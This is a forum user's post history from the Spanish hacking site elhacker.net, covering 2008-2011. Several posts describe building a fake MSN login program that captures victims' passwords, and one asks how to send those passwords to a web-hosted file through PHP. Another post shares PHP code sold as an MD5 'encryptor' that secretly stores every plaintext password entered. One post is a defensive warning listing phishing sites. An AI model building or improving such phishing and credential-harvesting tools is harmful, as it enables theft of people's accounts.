elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: 1 2 3 [4] 5 6
31  Programación / Programación Visual Basic / ¿Cojer datos de dos textboxes y escribirlo en txt alojado en web? en: 28 Abril 2009, 20:22 pm
A ver, mi duda yo creo que es facil de entender, pero con el titulo tan largo que le puse quizás lia un pelín...

El caso es que, como recordareis, hace tiempo hice el Msn Chorizator, un fake de msn en VB6, pues bien, ahora, viendo las sugerencias que me dejaron varios users en el post del programa, estoy intentando hacer una nueva versión, en la cual, entre otras cosas, tendrá como novedad que será online, es decir, que en lugar de crearse un archivo de texto en el disco duro de la victima pues que lo que haga sea lo siguiente:

La victima escribe sus datos en las correspondientes textbox (user y pass) y cuando le da a enviar, le sale el msgbox de error bla bla bla...hasta ahí como la otra versión...pero ahora, que en vez de crearse el txt en el propio Pc de la victima, lo que haga sea que esos datos que ha introducido, sean llevados a una web, en la que hay alojado un txt y escriba ahi los datos, para que luego el usuario (no la victima, sino la otra persona) pueda ir a esa web y consultar el txt, en donde se almacenarán todas las passwords y login que la gente vaya consiguiendo sacar con el programa...

Pero ahora mi duda es, ¿cómo puedo capturar los datos de las textbox y una vez cogidos interactuar con el script php de la web para que los escriba en el txt de la web?

Es decir, ya sé como se escribe en un archivo de texto en php (de hecho ya hice pruebecillas anteriores con php sobre esto) pero el problema me surge a la hora de intentar combinar VB y PHP para que interactuen...

Bueno, un saludo, espero que puedan echarme una mano, y perdon por el sermón  :xD
32  Foros Generales / Sugerencias y dudas sobre el Foro / ¿Animacion nueva de los botones? =P en: 27 Abril 2009, 20:22 pm
Pues eso, que estaba escribiendo un post antes, y quise recalcar una frase en negrita, y al pasar el ratón sobre el botón me fije en que de pronto se puso como brillante, como si fuera con una pequeñita luz, me sorprendió porque otros dias que habia estado posteando no lo habia visto, es decir, al pasar por encima no cambiaba ni nada, y ahora de repente vi esa lucecita azul, como si fuera una especie de mini neón...  :xD

Nah, la verdad es que queda chulo así, pero es por simple curiosidad...¿es algo reciente no?

Para mas señas, me refiero a esto



Saludos  :D
33  Comunicaciones / Mensajería / Recopilación de páginas FAKE sobre Msn en las que NO entrar en: 17 Abril 2009, 23:53 pm
A raíz de éste post...

http://foro.elhacker.net/chats_irc_y_messengers/analizador_de_contactos_msn_fake-t252058.0.html

....he decidido crear este post, dedicado a hablar sobre las web fakes que simulan ser páginas inofensivas que te revelan con solo entrar, quien te ha bloqueado/desadmitido/eliminado, y lo que en realidad son...además sugerí crear este tema y el Moderador de la sección dijo que era buena idea... :P


¿Qué son los fakes?

Son muchas las páginas que hay en Internet que prometen servir para descubrir qué contactos nos tienen desadmitidos/eliminados de sus cuentas de correo, pero esas supuestas páginas mágicas no son más que una burda técnica por parte del creador de la web para intentar conseguir las passwords de todos los/las inocentes que día a día pican y meten sus datos, esperando descubrir si realmente esa persona que hace meses que no ven conectada les ha eliminado, o qué ha pasado...

¿Cómo lo hacen? Muy sencillo. Para acceder a las páginas de este tipo nos pedirá primero meter nuestros datos de la cuenta (mail y pass) para posteriormente, supuestamente, decirnos quienes nos tienen desadmitidos...pero, al introducir nuestros datos para acceder a nuestra cuenta desde la página, lo que ocurre es que esos datos que introducimos van a una base de datos, en la cual quedan almacenados....esperando a que el creador de la web fake entre en la base de datos, vea los datos de la víctima, y pueda entrar sin ningún problema.

Además, las webs de este tipo suelen disponer de una especie de bot, que al loguearnos con nuestros datos en nuestro msn desde la web nos cambian el nick que tengamos por una frase publcitaria de la web fake, para que otros contactos nuestos la vean y piquen también...

Cada día salen nuevas páginas de este tipo, de gente que se aburre y se dedican a valerse de la ignorancia e imprudencia de gente inocente, que ingresa sus datos sin saber que al hacer eso, lo que está haciendo es regalandole su msn al dueño de la web...

A continuación crearé una lista con las páginas fake más conocidas, para, en la medida de lo posible, evitar que la mayor cantidad de usuarios newbies del foro entren en este tipo de estafas y pierdan sus cuentas...

LISTADO DE WEBS FALSAS

QuienTeAdmite(.)com <-- Tuve k ponerlo asi por el filtro de spam del foro

www.msnsinadmision.com

www.desadmitido.com

www.desadmite.com

www.medesadmite.com

www.blockoo.com

www.blockeado.com

www.listamsn.net

www.checkmessenger2.net

www.queblock.com

http://es.bloquo.com

www.lohizo.com

www.quienteignora.com

www.blockstatus.com

www.checkmsnblock.com

www.descubremsn.com

www.cuentasborradas.com

www.scanmessenger.com

www.scanmessenger2.com

www.estasnoadmitido.com

www.tumsn.net

www.eliminalos.com

http://www.bloqueados.es/

www.quiennomeadmite.com.ar/

http://www.quienestebloquearon.com/


http://leelo252.bit.ly/historialmsn

http://tinyurl.com/bloqueo/yaya820  (al parecer es una web fake pero camuflada con el conocido acortador de url`s, y llega por mail, según me ha informado un usuario de este foro)

http://www.falsos.net/

http://www.webmessenger.es/

http://www.passwords.tapiporla.com/

http://www.baeme.info

http://www.mis-contactos.net




ACTUALIZADO: 26/5/2011

---------------------------------------------------------------------------------------

Bueno, ahí teneis unos cuantos ejemplos de páginas fraudulentas, y que obiamente no sirven para absolutamente NADA...bueno si.....para quedarnos sin msn  :xD

De momento esas son las páginas fake más conocidas, pero como ya he dicho mas arriba, el numero de este tipo de sitios web no para de crecer, y día a día salen nuevas, y también caen nuevas víctimas...

Recordad que no debeis meter vuestros datos en ningún otro sitio que no sea en la página oficial de vuestro correo ( www.hotmail.com , www.gmail.com) pero nunca en otros sitios, por muy fiables que estos puedan parecer a primera vista.

Si alguien conoce algun otro sitio fake que no esté en la lista le pediría que me enviase las url por MP, para que que en cuanto pueda lo añado a este listado.

Me gustaría que se fijase este post, ya que cada poco veo gente preguntando sobre si tal o cual web sirve realmente para ver los desadmitidos, y los Mods y demás usuarios se cansan de decirles a los usuarios una y otra vez lo mismo: ninguna web sirve para eso, todas ellas son fake...

Pero a pesar de eso, la gente sigue picando...

Igual que con la gilipollez esa de que si envias un mail a noseke direccion de msn con tu mail y contraseña te devuelven la pass del msn que tu quieras en un máximo de 24 horas...ese es otro fake mítico, pero que sigue haciendo que cientos y cientos de newbies confiados pierdan sus cuentas....y luego...vienen los lamentos....

Saludos.  ;)



34  Foros Generales / Sugerencias y dudas sobre el Foro / ¿Modificados niveles de lectura en el foro? en: 5 Marzo 2009, 18:38 pm
Bueno, en realidad ésto a mi no me afecta en absoluto, porque yo tengo mi cuenta creada aquí y si quiero ver el contenido del foro y postear no tengo mas que loguearme y listo...pero, simplemente por curiosidad....¿han cambiado los permisos de lectura del foro verdad? Lo digo porque he entrado en el foro (estando como invitado) y me he llevado la sorpresa de que no me dejaba ver nada, me llevaba directamente al panel de login...y hoy por la mañana, cuando entré en el foro (estando como invitado) en el instituto pues pude ver el foro sin problemas....por lo que deduzco que esto es algo que se ha hecho hace apenas unas horitas...¿no?

Bueno, es simple curiosidad, y ademas como no vi ningun otro post acerca del tema, pues...

Saludos...

P.D. supongo que esta nueva medida no será por escasez de users ¿no? Porque vamos, nadie duda de que éste foro es uno de los foros que mas actividad tiene de todo Internet....
35  Programación / PHP / [SRC] Encriptador de passwords en MD5 con Php [By Invisible_Hack] en: 26 Febrero 2009, 18:52 pm
Código del archivo index.php:

Código
  1.  
  2. <html>
  3. <head>
  4.  <title>cifrando en MD5</title>
  5. </head>
  6.  
  7. <body>
  8.  
  9. <form action="segundo.php" method="post">
  10. Escribe una pass: <input type="text" name="pass" size="10">
  11. <input type="submit" value="cifrar">
  12. </form>
  13.  
  14. </body>
  15. </html>
  16.  

Código del archivo segundo.php:

Código
  1.  
  2. <html>
  3. <head>
  4.   <title>cifrando EN MD5</title>
  5. </head>
  6.  
  7. <body>
  8.  
  9. <?
  10. $lol = $_POST["pass"];
  11. $cifrada = $_POST["pass"];
  12. $cifrada=md5($cifrada);
  13. echo "La pass introducida es: ".$_POST["pass"];
  14. print (" y la pass cifrada es: $cifrada \n");
  15. $fff = fopen("guardado.txt","a");
  16. fwrite($fff, "$cifrada \n");
  17. fwrite($fff, "$lol \n");
  18. fclose($fff);
  19. ?>
  20. </body>
  21. </html>
  22.  

Éste es mi primer aporte en la sección de Php en éste foro, y ya sé que no es gran cosa, pero bueno, estoy en mis inicios de Php, no pidais tanto  :xD

Si recordais, hace unos dias dije que habia hecho mi encriptador de MD5, y que quizás algún dia liberase el source, pues ahí lo teneis, creo que ya es hora de soltarlo, porque seguro que a más de uno le servirá, además de que es un proyecto simplito que hice en unas horas, ahora estoy metido en proyectos algo más potentes...

Además, cada palabra que es introducida por parte del usuario, se crea en nuestro FTP un archivo de texto llamado guardado.txt en donde quedarán almacenados ambos datos, es decir, la pass introducida por el user, y su equivalente en MD5, lo cual lo podemos usar a modo de base de datos....

Pues eso, espero que lo disfruten, y si lo publican en otro lado....ya saben, pongan bien claro by Invisible_Hack   :P

Saludos ^^
36  Programación / PHP / ¿Saber nombre del Pc en Php? en: 18 Febrero 2009, 20:41 pm
Buenas.

Hace unos dias que me ha dado por empezar a ponerme a hacer pequeñas pruebecitas con Php, y de momento voy bien, pero resulta que en uno de mis intentos pues me gustaría saber el nombre del Pc de la persona que visita mi página, y que quedase registrado en un .txt

Lo de quedar registrado en un txt eso ya lo conseguí hace tiempo, pero llevo mirando y remirando como un loco si hay alguna funcion en Php que permita sacar el nombre del Pc de la persona que visita la web, al igual que hay funciones para saber la Ip, el navegador etc, pero el nombre de la Pc he buscado y no he encontrado ninguna función para ello, y no sé si existirá, por lo tanto, vengo aqui para preguntaros si alguno de los usuarios mas experimentados de Php sabe si existe alguna función para ello  :)

Un saludo ^^
37  Foros Generales / Sugerencias y dudas sobre el Foro / Una curiosidad sobre los perfiles del foro en: 3 Febrero 2009, 20:05 pm
Bueno, pues hoy por pura casualidad estaba mirando los usuarios conectados en el foro, y al pasar el ratón por encima de uno de los nombres de los conectados, vi que el código que salía en la parte inferior de la pantalla (osea, cuando una web está totalmente cargada es donde sale lo de Terminado, bueno, pues al ir a un enlace sale el codigo del enlace) pues me di cuenta de que el nick actual de los usuarios no se corresponde con el actual....

Me explico...

Por ejemplo, si pasais el ratón por encima del nick de, por ejemplo, el usuario el-pollo en la parte de abajo del navegador el link que sale es

http://foro.elhacker.net/profiles/janito24-u269382.html

Cuando en lugar de janito24 deberia salir el nick actual, osea el-pollo

Me he fijado que al parecer los SMF guardan el primer nick con el que el usuario se registra, aunque después se lo cambie....

He probado con otro usuario que cambió de nick hace ya algun tiempo (Dynamique, que antes se llamaba Energy) y en la url de su perfil sale Energy en lugar de su actual nick....

Es simplemente una observación que me dio por hacer....(estoy un pelin aburrido hoy xD)

Saludos  ;)
38  Foros Generales / Sugerencias y dudas sobre el Foro / Propuesta - Sección para users ingleses en: 23 Enero 2009, 12:34 pm
Bueno, el otro dia, en un post (no recuerdo cual exactamente, pero fue en la sección de VB) pues un usuario de habla inglesa vino a preguntar una dudilla que tenía, y pues entre varios usuarios intentaron darle respuesta, y luego el chaval volvió para agradecer a todos que le hubieramos dado respuesta y tal....en fin, que no me voy a enrrollar, que creo que estaria bien que se crease una sección para que la gente de habla no española pudieran postear sus dudas y sus cosas alli (no crear una sección en ingles para cada tema, porque si no habria que crear cantidad de secciones y seria una locura) pero por lo menos una sección para que los ingleses/as pudiesen postear sus cosas allí..

He visto pocos ingleses aquí, pero verlos los he visto, y por eso creo que si no hay más es porque muchos entran, ven mucho contenido y tal pero como está todo en español les da digamos "corte" postear, ademas de que seguramente no entenderán la mayoria de lo que se habla....y pues seguro que si se crease esta sección el numero de users de habla no española aumentaría, y se demostraría que la informática y el hacking no les interesa solo a los de habla española....

Bueno, lo dejo como propuesto, a ver que opinais el resto, y sobre todo, El-brujo  ;D

Un saludo ^^
39  Programación / Programación Visual Basic / Debate: AutoIt, ¿el sucesor de Visual Basic? en: 12 Enero 2009, 20:40 pm
Se me ha ocurrido crear éste post a modo de debate, sobre qué opinais sobre si AutoIt será o no el sucesor de Visual Basic. Para los que nunca hayan oido sobre éste lenguaje (AutoIt) pues os comento que es un lenguaje de programación que comparte en muy gran medida muchas cosas de Visual Basic, entre las que se destaca la facilidad de creación de interfaces gráficas, además de, por ejemplo, que AutoIt no trabaja ni con .ocx ni con archivos externos, es decir, no depende de otros archivos, lo cual es bastante agradable porque seguro que más de uno ya estará harto de que cuando va a ejecutar una aplicación de VB le salga que necesita registrar nosequé archivo .ocx para que el programa tire y bla bla bla...

Y cuando digo que AutoIt es similar a VB no me refiero solo en el modo de programar, sino también en su sintaxis, ya que VB y AutoIt son iguales en un....calculo.....90% de su sintaxis.

Lo único que echo en falta de AutoIt en comparacion con VB es que para meterle codigo a los botones y a los controles pues hay que hacerlo de modo manual, es decir, no se añade código haciendo doble clic sobre el control, sino a mano...

Eso es lo único que creo que deberian mejorar, ya que se ahorra mucho más tiempo, eso sin duda, y cuanto más comodidad tenga el programador para desarrollar su trabajo, mejor ¿no?  ;)

Yo hace algunos meses me puse a investigar sobre AutoIt, y pues hice algunas cosillas con ese lenguaje (que las posteé en este foro) y pues después de eso me metí finalmente a VB...

Por si a alguien le interesa, y está aprendiendo a programar, aquí os pongo mi trayectoria en el tema de lenguajes de programación:

Batch (creo que todos empezamos por aquí)
C++ (aunque aquí realmente hice cuatro chorraditas, simplemente por "probar" cosas nuevas)
AutoIt (me quería meter en VB pero justo cuando iba a ello, descubrí casi por casualidad este lenguaje, y me quede un tiempo con el jeje)
VB(y finalmente, este lenguaje, que es en el que estoy metido ahora)

Sin duda Visual Basic también me gusta mucho (siempre me encantó, pero ahora que es cuando realmente estoy metido en ello pues es cuando le estoy cogiendo el verdadero gustito ^^) y pues es por eso que me ha parecido interesante crear este tema, sobre si creen ustedes que AutoIt sustituirá en un futuro a Visual Basic...

En fin, para los que quieran mas información sobre AutoIt les dejo un enlace...

Definicion AutoIt ----> http://es.wikipedia.org/wiki/AutoIt

Web Oficial ---> http://www.autoitscript.com/

¡¡Dejen sus opiniones!!  ;D

40  Programación / Programación Visual Basic / KIS salta ante programa inofensivo en VB, ¿por qué? en: 21 Diciembre 2008, 03:36 am
Hola chicos.

Bien, veréis, resulta que por fin he acabado de crear mi fake de msn (tenia ganas de hacerme uno, aunque evidentemente no lo voy a usar, pero por el simple hecho de programarlo) y pues ya lo he hecho, y lo he publicado en éste foro, en la sección de Software, les dejo el enlace por si le quieren echar un vistazo...

http://foro.elhacker.net/software/chorizator_20_by_invisiblehack-t239174.0.html;msg1144251#msg1144251

Bien, como véis, es un programa muy sencillo, lo único que hace es simular ser el Msn Live, con la misma interfaz y todo, y pues cuando el usuario mete su user y su clave y le da al botón de iniciar sesión, al usuario le salta un error, y su clave y usuario queda almacenada en un fichero de texto dentro del disco duro de la propia victima, no hace más que eso...

Pues bien, varios users han probado el programa, y varios de ellos que tenian en sus Pc`s instalados el KIS como antivirus, me dijeron que se lo detectaba como virus/gusano, y que se lo eliminaba al instante...

Yo tengo Panda 2009 (actualizado, claro) y no me ha saltado nada...

Entonces era por si me podríais decir el motivo de por qué salta el KIS ante mi programa, porque no me lo explico, ya digo que el programa no modificada nada, ni crea entradas en el registro, ni borra archivos....ni nada que se pueda considerar dañino o peligroso...

Un saludo, gracias  ;D
Páginas: 1 2 3 [4] 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines